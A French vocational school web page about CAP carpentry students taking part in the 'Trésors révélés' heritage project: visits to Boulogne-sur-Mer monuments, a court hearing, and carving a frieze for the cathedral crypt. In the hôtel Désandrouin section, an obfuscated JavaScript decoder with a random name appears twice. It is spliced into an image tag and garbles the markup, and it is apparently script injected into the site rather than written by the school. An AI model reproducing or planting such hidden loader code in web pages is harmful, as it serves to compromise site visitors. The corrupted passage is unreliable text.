2MF lycée Giraux Sannier

Nos élèves de CAP taillent la pierre

Des élèves de CAP au service de la culture.
«Un patrimoine taillé sur mesure.»

Le service de l’architecture et du patrimoine de Boulogne-sur-Mer,  Mme Graziato, professeur en Lettres-Histoire au lycée Giraux Sannier ont choisi les classes de 2 et 1 MF (Menuisiers Fabricants) pour intégrer le  projet européen appelé Trésors révélés. Au cours de ce projet les élèves seront amenés à rénover une frise de la crypte de la cathédrale Notre-Dame de Boulogne-sur-Mer. M. Bresson, professeur de mathématiques, participe aussi à ce projet. Les deux classes vont être initiées à la taille de la pierre par M. Cassarano, tailleur de pierre de la région et vont visiter des sites et monuments afin de découvrir toutes les richesses du patrimoine boulonnais.

Visite des carrières du boulonnais à proximité de Marquise.

Le 28 novembre 2011, les élèves de CAP, 2 et 1 MF sont  allés visiter les carrières du boulonnais  avec le service patrimoine et Madame Graziato ainsi que Monsieur Bresson et Monsieur Maerten.
Après la diffusion d’un  reportage sur le fonctionnement  des carrières dans le cadre du développement durable, les élèves ont participé à une visite guidée des carrières en bus.
Une visite étonnante qui a permis de découvrir une facette de notre région que les élèves ne  connaissaient  pas forcément.

[table "9" seems to be empty /]

Visite de la cathédrale de Notre Dame.

Le 12 décembre 2011,  les élèves de CAP, 2 et 1 MF sont  allés visiter la cathédrale Notre Dame de Boulogne- sur-Mer avec le service patrimoine, Madame Graziato  et Monsieur Bresson.
Ainsi, les élèves ont pu accéder à la crypte et  voir la frise qu’ils vont rénover avec l’aide de Monsieur Cassarano, tailleur de pierre.

Visite du beffroi de Boulogne-sur-Mer.

Le 23 janvier 2012, Madame Delsart du service patrimoine de Boulogne-sur-Mer, a fait visiter le plus plus vieil édifice de la ville, le beffroi, aux élèves de CAP qui étaient  accompagnés de Madame Graziato.

Visite du château musée de Boulogne-sur-Mer.

Le  2 avril 2012, les élèves de CAP sont allés visiter le château musée en haute ville, accompagnés de madame Graziato. La visite était organisée dans le cadre de leur participation au projet Trésors révélés. Léa Delsart, du service patrimoine, leur a permis d’accéder à des espaces habituellement fermés au public.

Les élèves de CAP, des citoyens en devenir.

Le 19 janvier 2012, les élèves de CAP, 2 et 1 MF, ont assisté à des audiences publiques au Tribunal de Grande Instance de Boulogne-sur-Mer. Les deux classes étaient accompagnées de Mme Graziato et Mr  Maerten. Le lendemain Madame Gouyou-Beauchamps, attachée juriste en charge des scolaires, est intervenue pour discuter avec les élèves de leur ressenti après ces audiences et du fonctionnement de la justice en France.

Visite de l'hôtel Désandrouin.

Le 16 avril 2012 accompagnés de Me Delsart, du service patrimoine et de Mme Graziato, les élèves de seconde CAP sont allés visiter l'hôtel Désandrouin, aussi appelé Palais Impérial, en raison des séjours qu'y fit Napoléon premier.
Cet édifice a été construit en 1777 sur les plans de l'architecte Giraux Sannier, dont le lycée porte le nom.
Mis à part lors des journées du patrimoine , le Palais n'est pas ouvert au public; mais les élèves y ont cependant eu accès.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandrouin.jpg">function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandrouin" src="http://www.girauxsannier.fr/wp-content/uploads/2012/03/hotel_desandrouin.jpg" alt="" width="300" height="199" />A quelques semaines de l'achèvement des travaux de restauration.

Petit à petit le travail prend forme, cela demande de plus en plus d'attention et de précision. La pierre est fragile et peut facilement casser.

La dernière séance de taille.

Les séances de taille sont arrivées à leur terme; Mr Cassarano doit maintenant, quand cela est nécessaire, rectifier ou peaufiner le travail. Les élèves peuvent être satisfaits de ce qu'ils ont  fait au cours de ces séances de taille. Les pierres doivent être exposées chez les partenaires britanniques du projet, à Canterbury d'ici la fin de l'année 2012, avant de revenir dans la cathédrale de Boulogne-sur-Mer.